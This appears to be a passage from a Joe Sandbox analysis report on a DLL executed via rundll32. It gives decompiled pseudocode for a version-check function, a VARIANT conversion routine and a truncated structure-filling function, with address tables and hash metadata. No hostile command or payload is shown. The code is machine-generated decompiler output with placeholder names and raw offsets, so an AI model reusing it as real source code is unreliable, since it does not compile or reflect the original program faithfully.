                                                                                                            Function 10034F96 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 24registryclipboardCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10034F96() {
				long _t5;
				int _t6;

				if((0x80000000 & GetVersion()) == 0 || GetVersion() != 4) {
					_t5 = GetVersion();
					if((0x80000000 & _t5) != 0) {
						L5:
						 *0x10048874 =  *0x10048874 & 0x00000000;
						return _t5;
					}
					_t5 = GetVersion();
					if(_t5 != 3) {
						goto L5;
					}
					goto L4;
				} else {
					L4:
					_t6 = RegisterClipboardFormatA("MSWHEEL_ROLLMSG");
					 *0x10048874 = _t6;
					return _t6;
				}
			}





                                                                                                            0x10034fa7
                                                                                                            0x10034fb1
                                                                                                            0x10034fb5
                                                                                                            0x10034fd1
                                                                                                            0x10034fd1
                                                                                                            0x00000000
                                                                                                            0x10034fd1
                                                                                                            0x10034fb7
                                                                                                            0x10034fbd
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10034fbf
                                                                                                            0x10034fbf
                                                                                                            0x10034fc4
                                                                                                            0x10034fca
                                                                                                            0x00000000
                                                                                                            0x10034fca

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Version$ClipboardFormatRegister
                                                                                                            • String ID: MSWHEEL_ROLLMSG
                                                                                                            • API String ID: 2888461884-2485103130
                                                                                                            • Opcode ID: 32f60e0fcc6082fade1895f3b1d0c0f18cc7d36d82aaeea90484ffbc470c6c03
                                                                                                            • Instruction ID: 0d45b66faa2ad64bfbc903d79e921ae9fe2923187844060e47b6127ebb4b5c7f
                                                                                                            • Opcode Fuzzy Hash: 32f60e0fcc6082fade1895f3b1d0c0f18cc7d36d82aaeea90484ffbc470c6c03
                                                                                                            • Instruction Fuzzy Hash: 78E0863EC001334EE743B7749F4035D66E4CB4A2D2F6B403AD9018F555DE2459438BB5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10019F87 Relevance: 9.4, APIs: 6, Instructions: 404COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 83%
                                                                                                            			E10019F87(void* __ebx, void* __ecx, signed short __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t163;
				signed short _t178;
				signed int _t184;
				signed short _t185;
				intOrPtr* _t187;
				void* _t189;
				signed short _t198;
				signed short _t200;
				signed int _t203;
				signed short _t206;
				signed short _t213;
				signed short _t215;
				signed short _t224;
				long long* _t231;
				intOrPtr* _t235;
				void* _t237;
				void* _t243;
				void* _t246;
				intOrPtr* _t248;
				void* _t254;
				void* _t257;
				signed int _t260;
				signed short _t261;
				signed short _t262;
				signed short _t266;
				signed short _t270;
				intOrPtr* _t271;
				void* _t281;
				signed short _t295;
				void* _t339;
				void* _t341;
				signed short _t343;
				void* _t344;
				intOrPtr* _t345;
				signed int _t346;
				void* _t348;
				intOrPtr _t352;
				signed long long _t358;

				_t342 = __esi;
				_t337 = __edx;
				_t282 = __ecx;
				_t346 = _t348 - 0x64;
				_t163 =  *0x10045580; // 0x6a53a566
				 *(_t346 + 0x68) = _t163 ^ _t346;
				_push(0xcc);
				E1001FBC4(E10034676, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t346 + 0x4c)) =  *((intOrPtr*)(_t346 + 0x74));
				_t339 = __ecx;
				 *(_t346 + 0x30) = 0;
				_t352 =  *((intOrPtr*)(__ecx + 0x48));
				_t353 = _t352 == 0;
				if(_t352 == 0) {
					L1:
					E10004E6E(0, _t282, _t339, _t342, _t353);
				}
				if((0 |  *((intOrPtr*)(_t339 + 0x54)) != 0x00000000) == 0) {
					goto L1;
				}
				E1001BDF4(_t346 + 0x3c);
				_t343 = 3;
				 *((intOrPtr*)(_t346 - 4)) = 0;
				 *(_t346 + 0x50) = _t343;
				E10017AC2( *((intOrPtr*)(_t339 + 0x54)),  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x50);
				if( *(_t346 + 0x50) != _t343) {
					_t340 =  *((intOrPtr*)(_t339 + 0x54));
					_t178 = E10015BAB( *((intOrPtr*)(_t339 + 0x54)), __eflags,  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x50);
					__eflags = _t178;
					if(_t178 == 0) {
						goto L4;
					} else {
						_t184 =  *(_t346 + 0x50) & 0x0000ffff;
						_t345 = __imp__#9;
						__eflags = _t184 - 0x81;
						if(__eflags > 0) {
							_t185 = _t184 - 0x82;
							__eflags = _t185;
							if(__eflags == 0) {
								goto L50;
							} else {
								_t198 = _t185 - 1;
								__eflags = _t198;
								if(__eflags == 0) {
									_t200 = E10017807(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x54);
									__eflags = _t200;
									if(_t200 != 0) {
										__eflags =  *(_t346 + 0x55);
										asm("fild qword [ebp+0x57]");
										if( *(_t346 + 0x55) > 0) {
											do {
												_t139 = _t346 + 0x55;
												 *_t139 =  *(_t346 + 0x55) - 1;
												__eflags =  *_t139;
												_t358 = _t358 /  *0x10038c38;
											} while ( *_t139 != 0);
										}
										__eflags =  *(_t346 + 0x56);
										if( *(_t346 + 0x56) == 0) {
											asm("fchs");
										}
										 *(_t346 - 0x14) = _t358;
										 *(_t346 - 0x1c) = 5;
										 *((char*)(_t346 - 4)) = 0xe;
										E1001BDD4(_t346 - 0x1c, _t346 + 0x3c, _t346 - 0x1c);
										_t203 = _t346 - 0x1c;
										goto L30;
									}
								} else {
									_t206 = _t198;
									__eflags = _t206;
									if(__eflags == 0) {
										__eflags = E10017831(_t340, _t345, __eflags,  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x34);
										if(__eflags != 0) {
											asm("fldz");
											 *(_t346 + 0x58) = _t358;
											_t337 =  *(_t346 + 0x34);
											 *((intOrPtr*)(_t346 + 0x60)) = 0;
											E10015A3D(_t346 + 0x58, _t340, __eflags,  *(_t346 + 0x34),  *(_t346 + 0x36) & 0x0000ffff,  *(_t346 + 0x38) & 0x0000ffff, 0, 0, 0);
											 *_t346 = 7;
											 *(_t346 + 8) =  *(_t346 + 0x58);
											 *((char*)(_t346 - 4)) = 0xf;
											E1001BDD4(_t346, _t346 + 0x3c, _t346);
											_t203 = _t346;
											goto L30;
										}
									} else {
										_t213 = _t206 - 1;
										__eflags = _t213;
										if(__eflags == 0) {
											_t215 = E10017831(_t340, _t345, __eflags,  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x34);
											__eflags = _t215;
											if(_t215 != 0) {
												asm("fldz");
												 *(_t346 + 0x58) = _t358;
												 *((intOrPtr*)(_t346 + 0x60)) = 0;
												E10015A9D( *(_t346 + 0x34) & 0x0000ffff,  *(_t346 + 0x36) & 0x0000ffff,  *(_t346 + 0x38) & 0x0000ffff);
												 *(_t346 - 0x4c) = 7;
												 *(_t346 - 0x44) =  *(_t346 + 0x58);
												 *((char*)(_t346 - 4)) = 0x10;
												E1001BDD4(_t346 - 0x4c, _t346 + 0x3c, _t346 - 0x4c);
												_t203 = _t346 - 0x4c;
												goto L30;
											}
										} else {
											__eflags = _t213 - 1;
											if(__eflags == 0) {
												_t224 = E10017866(_t340, _t345, __eflags,  *((intOrPtr*)(_t346 + 0x78)), _t346 + 0x54);
												__eflags = _t224;
												if(_t224 != 0) {
													_t231 = E10017A12(_t346 - 0xd8,  *((short*)(_t346 + 0x54)),  *(_t346 + 0x56) & 0x0000ffff,  *(_t346 + 0x58) & 0x0000ffff,  *(_t346 + 0x5a) & 0x0000ffff,  *(_t346 + 0x5c) & 0x0000ffff,  *(_t346 + 0x5e) & 0x0000ffff);
													 *(_t346 - 0x3c) = 7;
													 *((long long*)(_t346 - 0x34)) =  *_t231;
													 *((char*)(_t346 - 4)) = 0x11;
													E1001BDD4(_t346 - 0x3c, _t346 + 0x3c, _t346 - 0x3c);
													_t203 = _t346 - 0x3c;
													goto L30;
												}
											}
										}
									}
								}
							}
						} else {
							if(__eflags == 0) {
								_t235 = E1000563B(0, _t346 + 0x50, _t340, _t345, __eflags);
								 *((char*)(_t346 - 4)) = 2;
								_t237 = E1001C08A(0, _t346 - 0xbc, _t340, _t345, __eflags);
								 *((char*)(_t346 - 4)) = 3;
								E1001BDD4(_t237, _t346 + 0x3c, _t237);
								 *_t345(_t346 - 0xbc,  *_t235, 8, E10015BDC(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
								_t295 =  *(_t346 + 0x50);
								goto L51;
							} else {
								__eflags = _t184 - 8;
								if(__eflags > 0) {
									__eflags = _t184 - 0xb;
									if(__eflags == 0) {
										_t243 = E1001BD1D(_t346 - 0x9c,  *(E10015BDC(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)))) & 0x0000ffff, 0xb);
										 *((char*)(_t346 - 4)) = 0xb;
										E1001BDD4(_t243, _t346 + 0x3c, _t243);
										_t203 = _t346 - 0x9c;
										goto L30;
									} else {
										__eflags = _t184 - 0xc;
										if(__eflags == 0) {
											_t246 = E1001BF8E(_t346 - 0x8c, E10015BDC(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
											 *((char*)(_t346 - 4)) = 1;
											E1001BDD4(_t246, _t346 + 0x3c, _t246);
											_t203 = _t346 - 0x8c;
											goto L30;
										} else {
											__eflags = _t184 - 0xf;
											if(_t184 > 0xf) {
												__eflags = _t184 - 0x11;
												if(__eflags <= 0) {
													_t248 = E10015BDC(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)));
													 *(_t346 - 0x5c) = 0x11;
													 *((char*)(_t346 - 0x54)) =  *_t248;
													 *((char*)(_t346 - 4)) = 6;
													E1001BDD4(_t346 - 0x5c, _t346 + 0x3c, _t346 - 0x5c);
													_t203 = _t346 - 0x5c;
													goto L30;
												} else {
													__eflags = _t184 - 0x12;
													if(__eflags == 0) {
														goto L27;
													} else {
														__eflags = _t184 - 0x13;
														if(__eflags == 0) {
															goto L26;
														}
													}
												}
											}
										}
									}
								} else {
									if(__eflags == 0) {
										L50:
										_t187 = E10005525(0, _t346 + 0x30, _t340, _t345, __eflags);
										 *((char*)(_t346 - 4)) = 4;
										_t189 = E1001C08A(0, _t346 - 0xcc, _t340, _t345, __eflags);
										 *((char*)(_t346 - 4)) = 5;
										E1001BDD4(_t189, _t346 + 0x3c, _t189);
										 *_t345(_t346 - 0xcc,  *_t187, 8, E10015BDC(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
										_t295 =  *(_t346 + 0x30);
										L51:
										__eflags = _t295 + 0xfffffff0;
										 *((char*)(_t346 - 4)) = 0;
										E10001260(_t295 + 0xfffffff0, _t337);
									} else {
										_t260 = _t184;
										__eflags = _t260;
										if(__eflags == 0) {
											L27:
											_t254 = E1001BD1D(_t346 - 0xac,  *(E10015BDC(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)))) & 0x0000ffff, 2);
											 *((char*)(_t346 - 4)) = 7;
											E1001BDD4(_t254, _t346 + 0x3c, _t254);
											_t203 = _t346 - 0xac;
											goto L30;
										} else {
											_t261 = _t260 - 1;
											__eflags = _t261;
											if(__eflags == 0) {
												L26:
												_t257 = E1001BD44(_t346 - 0x7c,  *(E10015BDC(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)))), 3);
												 *((char*)(_t346 - 4)) = 8;
												E1001BDD4(_t257, _t346 + 0x3c, _t257);
												_t203 = _t346 - 0x7c;
												goto L30;
											} else {
												_t262 = _t261 - 1;
												__eflags = _t262;
												if(__eflags == 0) {
													 *(_t346 + 0x50) =  *(E10015BDC(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
													 *(_t346 + 0x10) = 4;
													 *(_t346 + 0x18) =  *(_t346 + 0x50);
													 *((char*)(_t346 - 4)) = 9;
													E1001BDD4(_t346 + 0x10, _t346 + 0x3c, _t346 + 0x10);
													_t203 = _t346 + 0x10;
													goto L30;
												} else {
													_t266 = _t262 - 1;
													__eflags = _t266;
													if(__eflags == 0) {
														 *(_t346 - 0x24) =  *(E10015BDC(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
														 *(_t346 - 0x2c) = 5;
														 *((char*)(_t346 - 4)) = 0xa;
														E1001BDD4(_t346 - 0x2c, _t346 + 0x3c, _t346 - 0x2c);
														_t203 = _t346 - 0x2c;
														goto L30;
													} else {
														_t270 = _t266 - 1;
														__eflags = _t270;
														if(__eflags == 0) {
															_t271 = E10015BDC(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78)));
															 *(_t346 + 0x20) = 6;
															 *((intOrPtr*)(_t346 + 0x28)) =  *_t271;
															 *((intOrPtr*)(_t346 + 0x2c)) =  *((intOrPtr*)(_t271 + 4));
															 *((char*)(_t346 - 4)) = 0xd;
															E1001BDD4(_t346 + 0x20, _t346 + 0x3c, _t346 + 0x20);
															_t203 = _t346 + 0x20;
															goto L30;
														} else {
															__eflags = _t270 - 1;
															if(__eflags == 0) {
																 *(_t346 - 0x64) =  *(E10015BDC(_t340, __eflags,  *((intOrPtr*)(_t346 + 0x78))));
																 *(_t346 - 0x6c) = 7;
																 *((char*)(_t346 - 4)) = 0xc;
																E1001BDD4(_t346 - 0x6c, _t346 + 0x3c, _t346 - 0x6c);
																_t203 = _t346 - 0x6c;
																L30:
																 *((char*)(_t346 - 4)) = 0;
																 *_t345(_t203);
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
						E1001BF8E( *((intOrPtr*)(_t346 + 0x4c)), _t346 + 0x3c);
						 *_t345(_t346 + 0x3c);
					}
				} else {
					L4:
					E1001BF8E( *((intOrPtr*)(_t346 + 0x4c)), _t346 + 0x3c);
					__imp__#9(_t346 + 0x3c);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t346 - 0xc));
				_pop(_t341);
				_pop(_t344);
				_pop(_t281);
				return E1001FBB5( *((intOrPtr*)(_t346 + 0x4c)), _t281,  *(_t346 + 0x68) ^ _t346, _t337, _t341, _t344);
			}










































                                                                                                            0x10019f87
                                                                                                            0x10019f87
                                                                                                            0x10019f87
                                                                                                            0x10019f8b
                                                                                                            0x10019f8f
                                                                                                            0x10019f96
                                                                                                            0x10019f99
                                                                                                            0x10019fa3
                                                                                                            0x10019fad
                                                                                                            0x10019fb2
                                                                                                            0x10019fb4
                                                                                                            0x10019fb7
                                                                                                            0x10019fbd
                                                                                                            0x10019fbf
                                                                                                            0x10019fc1
                                                                                                            0x10019fc1
                                                                                                            0x10019fc1
                                                                                                            0x10019fd0
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10019fd6
                                                                                                            0x10019fe0
                                                                                                            0x10019fe8
                                                                                                            0x10019feb
                                                                                                            0x10019fee
                                                                                                            0x10019ff6
                                                                                                            0x1001a013
                                                                                                            0x1001a01f
                                                                                                            0x1001a024
                                                                                                            0x1001a026
                                                                                                            0x00000000
                                                                                                            0x1001a028
                                                                                                            0x1001a028
                                                                                                            0x1001a02c
                                                                                                            0x1001a037
                                                                                                            0x1001a039
                                                                                                            0x1001a293
                                                                                                            0x1001a293
                                                                                                            0x1001a298
                                                                                                            0x00000000
                                                                                                            0x1001a29e
                                                                                                            0x1001a29e
                                                                                                            0x1001a29e
                                                                                                            0x1001a29f
                                                                                                            0x1001a3d7
                                                                                                            0x1001a3dc
                                                                                                            0x1001a3de
                                                                                                            0x1001a3e4
                                                                                                            0x1001a3e7
                                                                                                            0x1001a3ea
                                                                                                            0x1001a3ec
                                                                                                            0x1001a3ec
                                                                                                            0x1001a3ec
                                                                                                            0x1001a3ec
                                                                                                            0x1001a3ef
                                                                                                            0x1001a3ef
                                                                                                            0x1001a3ec
                                                                                                            0x1001a3f7
                                                                                                            0x1001a3fa
                                                                                                            0x1001a3fc
                                                                                                            0x1001a3fc
                                                                                                            0x1001a3fe
                                                                                                            0x1001a401
                                                                                                            0x1001a40e
                                                                                                            0x1001a412
                                                                                                            0x1001a417
                                                                                                            0x00000000
                                                                                                            0x1001a417
                                                                                                            0x1001a2a5
                                                                                                            0x1001a2a6
                                                                                                            0x1001a2a6
                                                                                                            0x1001a2a7
                                                                                                            0x1001a380
                                                                                                            0x1001a382
                                                                                                            0x1001a38c
                                                                                                            0x1001a392
                                                                                                            0x1001a395
                                                                                                            0x1001a3a2
                                                                                                            0x1001a3a5
                                                                                                            0x1001a3aa
                                                                                                            0x1001a3b3
                                                                                                            0x1001a3bd
                                                                                                            0x1001a3c1
                                                                                                            0x1001a3c6
                                                                                                            0x00000000
                                                                                                            0x1001a3c6
                                                                                                            0x1001a2ad
                                                                                                            0x1001a2ad
                                                                                                            0x1001a2ad
                                                                                                            0x1001a2ae
                                                                                                            0x1001a322
                                                                                                            0x1001a327
                                                                                                            0x1001a329
                                                                                                            0x1001a333
                                                                                                            0x1001a336
                                                                                                            0x1001a346
                                                                                                            0x1001a349
                                                                                                            0x1001a34e
                                                                                                            0x1001a357
                                                                                                            0x1001a361
                                                                                                            0x1001a365
                                                                                                            0x1001a36a
                                                                                                            0x00000000
                                                                                                            0x1001a36a
                                                                                                            0x1001a2b0
                                                                                                            0x1001a2b0
                                                                                                            0x1001a2b1
                                                                                                            0x1001a2c0
                                                                                                            0x1001a2c5
                                                                                                            0x1001a2c7
                                                                                                            0x1001a2f1
                                                                                                            0x1001a2f6
                                                                                                            0x1001a2fe
                                                                                                            0x1001a308
                                                                                                            0x1001a30c
                                                                                                            0x1001a311
                                                                                                            0x00000000
                                                                                                            0x1001a311
                                                                                                            0x1001a2c7
                                                                                                            0x1001a2b1
                                                                                                            0x1001a2ae
                                                                                                            0x1001a2a7
                                                                                                            0x1001a29f
                                                                                                            0x1001a03f
                                                                                                            0x1001a03f
                                                                                                            0x1001a25c
                                                                                                            0x1001a26c
                                                                                                            0x1001a270
                                                                                                            0x1001a279
                                                                                                            0x1001a27d
                                                                                                            0x1001a289
                                                                                                            0x1001a28b
                                                                                                            0x00000000
                                                                                                            0x1001a045
                                                                                                            0x1001a045
                                                                                                            0x1001a048
                                                                                                            0x1001a137
                                                                                                            0x1001a13a
                                                                                                            0x1001a234
                                                                                                            0x1001a23d
                                                                                                            0x1001a241
                                                                                                            0x1001a246
                                                                                                            0x00000000
                                                                                                            0x1001a140
                                                                                                            0x1001a140
                                                                                                            0x1001a143
                                                                                                            0x1001a1fb
                                                                                                            0x1001a204
                                                                                                            0x1001a208
                                                                                                            0x1001a20d
                                                                                                            0x00000000
                                                                                                            0x1001a149
                                                                                                            0x1001a149
                                                                                                            0x1001a14c
                                                                                                            0x1001a152
                                                                                                            0x1001a155
                                                                                                            0x1001a1c5
                                                                                                            0x1001a1cc
                                                                                                            0x1001a1d2
                                                                                                            0x1001a1dc
                                                                                                            0x1001a1e0
                                                                                                            0x1001a1e5
                                                                                                            0x00000000
                                                                                                            0x1001a157
                                                                                                            0x1001a157
                                                                                                            0x1001a15a
                                                                                                            0x00000000
                                                                                                            0x1001a15c
                                                                                                            0x1001a15c
                                                                                                            0x1001a15f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001a15f
                                                                                                            0x1001a15a
                                                                                                            0x1001a155
                                                                                                            0x1001a14c
                                                                                                            0x1001a143
                                                                                                            0x1001a04e
                                                                                                            0x1001a04e
                                                                                                            0x1001a41f
                                                                                                            0x1001a42d
                                                                                                            0x1001a43d
                                                                                                            0x1001a441
                                                                                                            0x1001a44a
                                                                                                            0x1001a44e
                                                                                                            0x1001a45a
                                                                                                            0x1001a45c
                                                                                                            0x1001a45f
                                                                                                            0x1001a45f
                                                                                                            0x1001a462
                                                                                                            0x1001a465
                                                                                                            0x1001a054
                                                                                                            0x1001a055
                                                                                                            0x1001a055
                                                                                                            0x1001a056
                                                                                                            0x1001a190
                                                                                                            0x1001a1a6
                                                                                                            0x1001a1af
                                                                                                            0x1001a1b3
                                                                                                            0x1001a1b8
                                                                                                            0x00000000
                                                                                                            0x1001a05c
                                                                                                            0x1001a05c
                                                                                                            0x1001a05c
                                                                                                            0x1001a05d
                                                                                                            0x1001a165
                                                                                                            0x1001a176
                                                                                                            0x1001a17f
                                                                                                            0x1001a183
                                                                                                            0x1001a188
                                                                                                            0x00000000
                                                                                                            0x1001a063
                                                                                                            0x1001a063
                                                                                                            0x1001a063
                                                                                                            0x1001a064
                                                                                                            0x1001a110
                                                                                                            0x1001a113
                                                                                                            0x1001a11c
                                                                                                            0x1001a126
                                                                                                            0x1001a12a
                                                                                                            0x1001a12f
                                                                                                            0x00000000
                                                                                                            0x1001a06a
                                                                                                            0x1001a06a
                                                                                                            0x1001a06a
                                                                                                            0x1001a06b
                                                                                                            0x1001a0e3
                                                                                                            0x1001a0e6
                                                                                                            0x1001a0f3
                                                                                                            0x1001a0f7
                                                                                                            0x1001a0fc
                                                                                                            0x00000000
                                                                                                            0x1001a06d
                                                                                                            0x1001a06d
                                                                                                            0x1001a06d
                                                                                                            0x1001a06e
                                                                                                            0x1001a0a9
                                                                                                            0x1001a0b3
                                                                                                            0x1001a0b9
                                                                                                            0x1001a0bc
                                                                                                            0x1001a0c6
                                                                                                            0x1001a0ca
                                                                                                            0x1001a0cf
                                                                                                            0x00000000
                                                                                                            0x1001a070
                                                                                                            0x1001a070
                                                                                                            0x1001a071
                                                                                                            0x1001a083
                                                                                                            0x1001a086
                                                                                                            0x1001a093
                                                                                                            0x1001a097
                                                                                                            0x1001a09c
                                                                                                            0x1001a213
                                                                                                            0x1001a214
                                                                                                            0x1001a217
                                                                                                            0x1001a217
                                                                                                            0x1001a071
                                                                                                            0x1001a06e
                                                                                                            0x1001a06b
                                                                                                            0x1001a064
                                                                                                            0x1001a05d
                                                                                                            0x1001a056
                                                                                                            0x1001a04e
                                                                                                            0x1001a048
                                                                                                            0x1001a03f
                                                                                                            0x1001a471
                                                                                                            0x1001a47a
                                                                                                            0x1001a47a
                                                                                                            0x10019ff8
                                                                                                            0x10019ff8
                                                                                                            0x10019fff
                                                                                                            0x1001a008
                                                                                                            0x1001a008
                                                                                                            0x1001a482
                                                                                                            0x1001a48a
                                                                                                            0x1001a48b
                                                                                                            0x1001a48c
                                                                                                            0x1001a49b

                                                                                                            APIs
                                                                                                            • __EH_prolog3.LIBCMT ref: 10019FA3
                                                                                                            • VariantClear.OLEAUT32(?), ref: 1001A008
                                                                                                              • Part of subcall function 10004E6E: __CxxThrowException@8.LIBCMT ref: 10004E82
                                                                                                              • Part of subcall function 10004E6E: __EH_prolog3.LIBCMT ref: 10004E8F
                                                                                                            • VariantClear.OLEAUT32(?), ref: 1001A217
                                                                                                            • VariantClear.OLEAUT32(?), ref: 1001A289
                                                                                                            • VariantClear.OLEAUT32(?), ref: 1001A47A
                                                                                                              • Part of subcall function 1001BDD4: VariantCopy.OLEAUT32(?,?), ref: 1001BDE2
                                                                                                              • Part of subcall function 1000563B: __EH_prolog3.LIBCMT ref: 10005642
                                                                                                              • Part of subcall function 1001C08A: __EH_prolog3.LIBCMT ref: 1001C094
                                                                                                              • Part of subcall function 1001C08A: lstrlenA.KERNEL32(?,00000224,1001A446,?,00000008,00000000,?,000000CC), ref: 1001C0B3
                                                                                                              • Part of subcall function 1001C08A: SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 1001C0BB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Variant$ClearH_prolog3$AllocByteCopyException@8StringThrowlstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1021156189-0
                                                                                                            • Opcode ID: 11928700629b18b402dda85779f21ecb76941389bd754c7d3cf7010b2ddea385
                                                                                                            • Instruction ID: 4e7b89f9de4aa6b433371361e179044e480e3473b7358c3f62ac7a10d9bffcd1
                                                                                                            • Opcode Fuzzy Hash: 11928700629b18b402dda85779f21ecb76941389bd754c7d3cf7010b2ddea385
                                                                                                            • Instruction Fuzzy Hash: B3F1587480014CEADF55DFA4C880AED7BB9FF09344F50805AF8559B292EB74EAC8DB61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001D5EB Relevance: 9.1, APIs: 6, Instructions: 118memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 42%
                                                                                                            			E1001D5EB(void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t42;
				void* _t46;
				void* _t47;
				void* _t52;
				intOrPtr _t66;
				intOrPtr _t74;
				void* _t76;
				void* _t96;
				void* _t97;
				intOrPtr* _t98;
				void* _t99;
				short* _t101;
				void* _t102;
				signed int _t103;
				void* _t105;

				_t96 = __edx;
				_t103 = _t105 - 0x8c;
				_t42 =  *0x10045580; // 0x6a53a566
				 *(_t103 + 0x88) = _t42 ^ _t103;
				_t74 =  *((intOrPtr*)(_t103 + 0x98));
				_t101 =  *((intOrPtr*)(_t103 + 0x94));
				_push(_t97);
				E10020F40(_t97, _t101, 0, 0x20);
				 *((intOrPtr*)(_t103 - 0x80)) = _t103 - 0x78;
				_t46 = E1001056A(_t74, 0x10038ea0);
				_t98 = __imp__#2;
				if(_t46 == 0) {
					_t78 = _t74;
					_t47 = E1001056A(_t74, 0x10036ce4);
					__eflags = _t47;
					_push(0x100);
					_push(_t103 - 0x78);
					if(_t47 == 0) {
						_push(0xf108);
						E100103ED(_t74, _t78, _t98, _t101, _t103);
						 *_t101 = 0xf108;
					} else {
						_push(0xf10a);
						E100103ED(_t74, _t78, _t98, _t101, _t103);
						 *_t101 = 0xf10a;
					}
				} else {
					 *((intOrPtr*)(_t103 - 0x80)) =  *((intOrPtr*)(_t74 + 0xc));
					 *_t101 =  *((intOrPtr*)(_t74 + 8));
					 *((intOrPtr*)(_t101 + 0x10)) =  *((intOrPtr*)(_t74 + 0x10));
					 *((intOrPtr*)(_t101 + 0x1c)) =  *((intOrPtr*)(_t74 + 0x1c));
					_t66 =  *((intOrPtr*)(_t74 + 0x14));
					_t111 =  *((intOrPtr*)(_t66 - 0xc));
					if( *((intOrPtr*)(_t66 - 0xc)) != 0) {
						 *((intOrPtr*)(_t101 + 0xc)) =  *_t98( *((intOrPtr*)(E1000567F(_t74, _t103 - 0x7c, _t98, _t101, _t111))), _t66);
						E10001260( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
					}
					_t74 =  *((intOrPtr*)(_t74 + 0x18));
					_t113 =  *((intOrPtr*)(_t74 - 0xc));
					if( *((intOrPtr*)(_t74 - 0xc)) != 0) {
						 *((intOrPtr*)(_t101 + 4)) =  *_t98( *((intOrPtr*)(E1000567F(_t74, _t103 - 0x7c, _t98, _t101, _t113))), _t74);
						E10001260( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
					}
				}
				 *((intOrPtr*)(_t101 + 8)) =  *_t98( *((intOrPtr*)(E1000567F(_t74, _t103 - 0x7c, _t98, _t101, _t113))),  *((intOrPtr*)(_t103 - 0x80)));
				_t52 = E10001260( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
				_t114 =  *((intOrPtr*)(_t101 + 4));
				if( *((intOrPtr*)(_t101 + 4)) == 0) {
